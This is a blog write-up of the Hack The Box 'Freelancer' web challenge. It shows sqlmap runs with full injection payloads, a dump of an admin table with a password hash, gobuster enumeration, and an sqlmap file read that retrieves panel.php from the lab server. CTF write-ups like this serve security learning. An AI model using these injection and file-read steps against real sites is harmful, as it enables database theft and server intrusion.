<!DOCTYPE html><html lang="en-US" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.4.1" /><meta property="og:title" content="Freelancer" /><meta property="og:locale" content="en_US" /><meta name="description" content="Freelancer" /><meta property="og:description" content="Freelancer" /><link rel="canonical" href="http://susanou.github.io/Writeups/posts/freelancer/" /><meta property="og:url" content="http://susanou.github.io/Writeups/posts/freelancer/" /><meta property="og:site_name" content="Writeups" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-07-21T15:50:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Freelancer" /><meta name="twitter:site" content="@twitter_username" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2020-12-06T01:26:36+01:00","datePublished":"2020-07-21T15:50:00+02:00","description":"Freelancer","headline":"Freelancer","mainEntityOfPage":{"@type":"WebPage","@id":"http://susanou.github.io/Writeups/posts/freelancer/"},"url":"http://susanou.github.io/Writeups/posts/freelancer/"}</script><title>Freelancer | Writeups</title><link rel="apple-touch-icon" sizes="180x180" href="/Writeups/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/Writeups/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/Writeups/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/Writeups/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/Writeups/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Writeups"><meta name="application-name" content="Writeups"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/Writeups/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/Writeups/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script defer src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.15.0,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script async src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/Writeups/assets/js/dist/post.min.js"></script> <script defer src="/Writeups/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/Writeups/" alt="avatar" class="mx-auto"> <img src="/Writeups/assets/img/sample/avatar.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/Writeups/">Writeups</a></div><div class="site-subtitle font-italic">Student by day Hacker by night</div></div><ul class="w-100"><li class="nav-item"> <a href="/Writeups/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/Writeups/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/Writeups/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/Writeups/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/Writeups/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/Susanou" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://app.hackthebox.eu/profile/337512" aria-label="htb" target="_blank" rel="noopener"> <i class="fas fa-cube"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['cam.hochberg','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/Writeups/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a> <a href="https://www.linkedin.com/in/cam-hochberg/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/Writeups/"> Posts </a> </span> <span>Freelancer</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Freelancer</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Cameron Hochberg </span> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Tue, Jul 21, 2020, 3:50 PM +0200" prep="on" > Jul 21, 2020 <i class="unloaded">2020-07-21T15:50:00+02:00</i> </span></div><div> <span> <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, Dec 6, 2020, 1:26 AM +0100" prefix="Updated " > Dec 6, 2020 <i class="unloaded">2020-12-06T01:26:36+01:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="949 words">5 min</span></div></div><div class="post-content"><h1 id="freelancer"><a href="https://app.hackthebox.eu/challenges/82">Freelancer</a></h1><p>First if you look at the source code, you will find interesting comments:</p><pre><code class="language-HTML">&lt;img class="img-fluid" src="img/portfolio/cake.png" alt="" /&gt;
&lt;!-- &lt;a href="portfolio.php?id=2"&gt;Portfolio 2&lt;/a&gt; --&gt;

</code></pre><p>Let’s try sqlmap on that:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
</pre><td class="rouge-code"><pre>sqlmap  <span class="nt">-u</span> http://docker.hackthebox.eu:31458/portfolio.php?id<span class="o">=</span>1 <span class="nt">--tables</span>
        ___
       __H__
 ___ ___[<span class="o">)]</span>_____ ___ ___  <span class="o">{</span>1.4.7#stable<span class="o">}</span>
|_ -| <span class="nb">.</span> <span class="o">[</span><span class="s2">"]     | .'| . |
|___|_  ["</span><span class="o">]</span>_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

<span class="o">[!]</span> legal disclaimer: Usage of sqlmap <span class="k">for </span>attacking targets without prior mutual consent is illegal. It is the end user<span class="s1">'s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:20:13 /2020-08-10/

[17:20:13] [INFO] resuming back-end DBMS '</span>mysql<span class="s1">'
[17:20:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6549=6549

    Type: time-based blind
    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 7332 FROM (SELECT(SLEEP(5)))lRuy)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7171717a71,0x5148554977577945784f7045465162456c506a4e7a64457a42767a44754f727768694346626e5971,0x71717a6271)-- -
---
[17:20:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL &gt;= 5.0.12 (MariaDB fork)
[17:20:13] [INFO] fetching database names
[17:20:14] [INFO] fetching tables for databases: '</span>freelancer, information_schema, mysql, performance_schema<span class="s1">'
Database: freelancer
[2 tables]
+----------------------------------------------------+
| portfolio                                          |
| safeadmin                                          |
+----------------------------------------------------+

</span></pre></table></code></div></div><p>Now let’s dump <code class="language-plaintext highlighter-rouge">safeadmin</code>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
</pre><td class="rouge-code"><pre>sqlmap  <span class="nt">-u</span> http://docker.hackthebox.eu:31458/portfolio.php?id<span class="o">=</span>1 <span class="nt">-T</span> safeadmin <span class="nt">--dump</span>
        ___
       __H__
 ___ ___[<span class="o">(]</span>_____ ___ ___  <span class="o">{</span>1.4.7#stable<span class="o">}</span>
|_ -| <span class="nb">.</span> <span class="o">[</span><span class="s1">']     | .'</span>| <span class="nb">.</span> |
|___|_  <span class="o">[</span><span class="s1">']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'</span>s responsibility to obey all applicable <span class="nb">local</span>, state and federal laws. Developers assume no liability and are not responsible <span class="k">for </span>any misuse or damage caused by this program

<span class="o">[</span><span class="k">*</span><span class="o">]</span> starting @ 17:21:04 /2020-08-10/

<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] resuming back-end DBMS <span class="s1">'mysql'</span>
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] testing connection to the target URL
sqlmap resumed the following injection point<span class="o">(</span>s<span class="o">)</span> from stored session:
<span class="nt">---</span>
Parameter: <span class="nb">id</span> <span class="o">(</span>GET<span class="o">)</span>
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: <span class="nb">id</span><span class="o">=</span>1 AND <span class="nv">6549</span><span class="o">=</span>6549

    Type: time-based blind
    Title: MySQL <span class="o">&gt;=</span> 5.0.12 AND time-based blind <span class="o">(</span>query SLEEP<span class="o">)</span>
    Payload: <span class="nb">id</span><span class="o">=</span>1 AND <span class="o">(</span>SELECT 7332 FROM <span class="o">(</span>SELECT<span class="o">(</span>SLEEP<span class="o">(</span>5<span class="o">)))</span>lRuy<span class="o">)</span>

    Type: UNION query
    Title: Generic UNION query <span class="o">(</span>NULL<span class="o">)</span> - 3 columns
    Payload: <span class="nb">id</span><span class="o">=</span>1 UNION ALL SELECT NULL,NULL,CONCAT<span class="o">(</span>0x7171717a71,0x5148554977577945784f7045465162456c506a4e7a64457a42767a44754f727768694346626e5971,0x71717a6271<span class="o">)</span><span class="nt">--</span> -
<span class="nt">---</span>
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL <span class="o">&gt;=</span> 5.0.12 <span class="o">(</span>MariaDB fork<span class="o">)</span>
<span class="o">[</span>17:21:04] <span class="o">[</span>WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table<span class="o">(</span>s<span class="o">)</span> entries
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] fetching current database
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] fetching columns <span class="k">for </span>table <span class="s1">'safeadmin'</span> <span class="k">in </span>database <span class="s1">'freelancer'</span>
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] fetching entries <span class="k">for </span>table <span class="s1">'safeadmin'</span> <span class="k">in </span>database <span class="s1">'freelancer'</span>
Database: freelancer
Table: safeadmin
<span class="o">[</span>1 entry]
+------+----------+--------------------------------------------------------------+---------------------+
| <span class="nb">id</span>   | username | password                                                     | created_at          |
+------+----------+--------------------------------------------------------------+---------------------+
| 1    | safeadm  | <span class="nv">$2y$10$s2ZCi</span>/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K | 2019-07-16 20:25:45 |
+------+----------+--------------------------------------------------------------+---------------------+

<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] table <span class="s1">'freelancer.safeadmin'</span> dumped to CSV file <span class="s1">'/home/fukurou/.sqlmap/output/docker.hackthebox.eu/dump/freelancer/safeadmin.csv'</span>
<span class="o">[</span>17:21:04] <span class="o">[</span>INFO] fetched data logged to text files under <span class="s1">'/home/fukurou/.sqlmap/output/docker.hackthebox.eu'</span>

<span class="o">[</span><span class="k">*</span><span class="o">]</span> ending @ 17:21:04 /2020-08-10/
</pre></table></code></div></div><p>you can try to break the hash but it ended up being impossible so I gave up.</p><p>I went back to the start and decided to run a little more enumeration on the website with <code class="language-plaintext highlighter-rouge">gobuster</code>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://docker.hackthebox.eu:31458/ <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:            http://docker.hackthebox.eu:31458/
<span class="o">[</span>+] Threads:        10
<span class="o">[</span>+] Wordlist:       /usr/share/wordlists/dirb/big.txt
<span class="o">[</span>+] Status codes:   200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent:     gobuster/3.0.1
<span class="o">[</span>+] Timeout:        10s
<span class="o">===============================================================</span>
2020/08/10 17:23:00 Starting gobuster
<span class="o">===============================================================</span>
/.htaccess <span class="o">(</span>Status: 403<span class="o">)</span>
/.htpasswd <span class="o">(</span>Status: 403<span class="o">)</span>
/administrat <span class="o">(</span>Status: 301<span class="o">)</span>
/css <span class="o">(</span>Status: 301<span class="o">)</span>
/favicon.ico <span class="o">(</span>Status: 200<span class="o">)</span>
/img <span class="o">(</span>Status: 301<span class="o">)</span>
/js <span class="o">(</span>Status: 301<span class="o">)</span>
/mail <span class="o">(</span>Status: 301<span class="o">)</span>
/robots.txt <span class="o">(</span>Status: 200<span class="o">)</span>
/server-status <span class="o">(</span>Status: 403<span class="o">)</span>
/vendor <span class="o">(</span>Status: 301<span class="o">)</span>
<span class="o">===============================================================</span>
2020/08/10 17:24:02 Finished
<span class="o">===============================================================</span>

</pre></table></code></div></div><p>If you go to <code class="language-plaintext highlighter-rouge">/administrat</code> you will get to a login page. No luck trying to login but my guess is the flag was near. So time for some more enumeration:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre><td class="rouge-code"><pre>gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://docker.hackthebox.eu:31458/administrat <span class="nt">-w</span> /usr/share/wordlists/dirb/big.txt <span class="nt">-x</span> php
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:            http://docker.hackthebox.eu:31458/administrat
<span class="o">[</span>+] Threads:        10
<span class="o">[</span>+] Wordlist:       /usr/share/wordlists/dirb/big.txt
<span class="o">[</span>+] Status codes:   200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent:     gobuster/3.0.1
<span class="o">[</span>+] Extensions:     php
<span class="o">[</span>+] Timeout:        10s
<span class="o">===============================================================</span>
2020/08/10 17:26:07 Starting gobuster
<span class="o">===============================================================</span>
/.htpasswd <span class="o">(</span>Status: 403<span class="o">)</span>
/.htpasswd.php <span class="o">(</span>Status: 403<span class="o">)</span>
/.htaccess <span class="o">(</span>Status: 403<span class="o">)</span>
/.htaccess.php <span class="o">(</span>Status: 403<span class="o">)</span>
/include <span class="o">(</span>Status: 301<span class="o">)</span>
/index.php <span class="o">(</span>Status: 200<span class="o">)</span>
/logout.php <span class="o">(</span>Status: 302<span class="o">)</span>
/panel.php <span class="o">(</span>Status: 302<span class="o">)</span>
<span class="o">===============================================================</span>
2020/08/10 17:28:05 Finished
<span class="o">===============================================================</span>

</pre></table></code></div></div><p>Now let’s see the different files that are there <code class="language-plaintext highlighter-rouge">panel.php</code>, <code class="language-plaintext highlighter-rouge">logout.php</code> adn <code class="language-plaintext highlighter-rouge">index.php</code>. Since we want to read these files we also need to know the file structure. Usually this is close to something like <code class="language-plaintext highlighter-rouge">/var/www/html</code> so I tried with sqlmap:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>sqlmap <span class="nt">-u</span> http://docker.hackthebox.eu:31458/portfolio.php?id<span class="o">=</span>3 <span class="nt">--file-read</span><span class="o">=</span>/var/www/html/administrat/panel.php

</pre></table></code></div></div><p>Now let’s get the file that we got in <code class="language-plaintext highlighter-rouge">.sqlmap/output/docker.hackthebox.eu</code> we should see a <code class="language-plaintext highlighter-rouge">output</code> directory and the file is in there and the flag is in plain in the HTML</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/Writeups/categories/hack-the-box/'>Hack The Box</a>, <a href='/Writeups/categories/challenges/'>Challenges</a>, <a href='/Writeups/categories/web/'>Web</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/Writeups/tags/web/" class="post-tag no-text-decoration" >web</a> <a href="/Writeups/tags/sqli/" class="post-tag no-text-decoration" >SQLi</a> <a href="/Writeups/tags/source/" class="post-tag no-text-decoration" >source</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Freelancer - Writeups&url=http://susanou.github.io/Writeups/posts/freelancer/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Freelancer - Writeups&u=http://susanou.github.io/Writeups/posts/freelancer/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Freelancer - Writeups&url=http://susanou.github.io/Writeups/posts/freelancer/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/Writeups/posts/cycling/">Cycling</a><li><a href="/Writeups/posts/mlsteal/">MLSteal</a><li><a href="/Writeups/posts/pythia/">Pythia</a><li><a href="/Writeups/posts/ChunkNoris/">Chunk Norris</a><li><a href="/Writeups/posts/Admirer/">Admirer</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/Writeups/tags/crypto/">crypto</a> <a class="post-tag" href="/Writeups/tags/rsa/">RSA</a> <a class="post-tag" href="/Writeups/tags/easy/">easy</a> <a class="post-tag" href="/Writeups/tags/web/">web</a> <a class="post-tag" href="/Writeups/tags/aes/">AES</a> <a class="post-tag" href="/Writeups/tags/linux/">linux</a> <a class="post-tag" href="/Writeups/tags/misc/">misc</a> <a class="post-tag" href="/Writeups/tags/mitm/">MITM</a> <a class="post-tag" href="/Writeups/tags/sqli/">SQLi</a> <a class="post-tag" href="/Writeups/tags/crt/">CRT</a></div></div></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/Writeups/posts/emdeefiveforlife/"><div class="card-body"> <span class="timeago small" > Jul 20, 2020 <i class="unloaded">2020-07-20T15:50:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Emdee Five for Life</h3><div class="text-muted small"><p> Emdee Five For Life The idea of this challenge is to get the string and encrypt it using MD5 as fast as possible. Just write a small python script and get the flag from the result import request...</p></div></div></a></div><div class="card"> <a href="/Writeups/posts/phonebook/"><div class="card-body"> <span class="timeago small" > Nov 14, 2020 <i class="unloaded">2020-11-14T23:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Phonebook</h3><div class="text-muted small"><p> We see that there is a form. At the bottom we can see the username we are supposed to use. It doesn’t take a genius to see that the password is most likely the flag. While testing we see that we c...</p></div></div></a></div><div class="card"> <a href="/Writeups/posts/Admirer/"><div class="card-body"> <span class="timeago small" > Aug 1, 2020 <i class="unloaded">2020-08-01T00:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Admirer</h3><div class="text-muted small"><p> Reconnaissance &amp; Enumeration Let’s first start by looking at what ports are open on the machine: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 $ nmap -sS -sC -sV -p- 10.10.10.187 Star...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/Writeups/posts/emdeefiveforlife/" class="btn btn-outline-primary" prompt="Older"><p>Emdee Five for Life</p></a> <a href="/Writeups/posts/Admirer/" class="btn btn-outline-primary" prompt="Newer"><p>Admirer</p></a></div><div id="disqus" class="pt-2 pb-2"><p class="text-center text-muted small pb-5"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/Writeups/assets/js/lib/jquery.disqusloader.min.js"></script> <script> const options = { scriptUrl: '//writeups-fukurou.disqus.com/embed.js', disqusConfig: function() { this.page.title = 'Freelancer'; this.page.url = 'http://susanou.github.io/Writeups/posts/freelancer/'; this.page.identifier = '/posts/freelancer/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2025 <a href="https://github.com/Susanou">Cameron Hochberg</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div><script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="Susanou" data-description="Support me on Buy me a coffee!" data-message="" data-color="#5F7FFF" data-position="Right" data-x_margin="18" data-y_margin="18"></script></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/Writeups/tags/crypto/">crypto</a> <a class="post-tag" href="/Writeups/tags/rsa/">RSA</a> <a class="post-tag" href="/Writeups/tags/easy/">easy</a> <a class="post-tag" href="/Writeups/tags/web/">web</a> <a class="post-tag" href="/Writeups/tags/aes/">AES</a> <a class="post-tag" href="/Writeups/tags/linux/">linux</a> <a class="post-tag" href="/Writeups/tags/misc/">misc</a> <a class="post-tag" href="/Writeups/tags/mitm/">MITM</a> <a class="post-tag" href="/Writeups/tags/sqli/">SQLi</a> <a class="post-tag" href="/Writeups/tags/crt/">CRT</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/Writeups/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="http://susanou.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
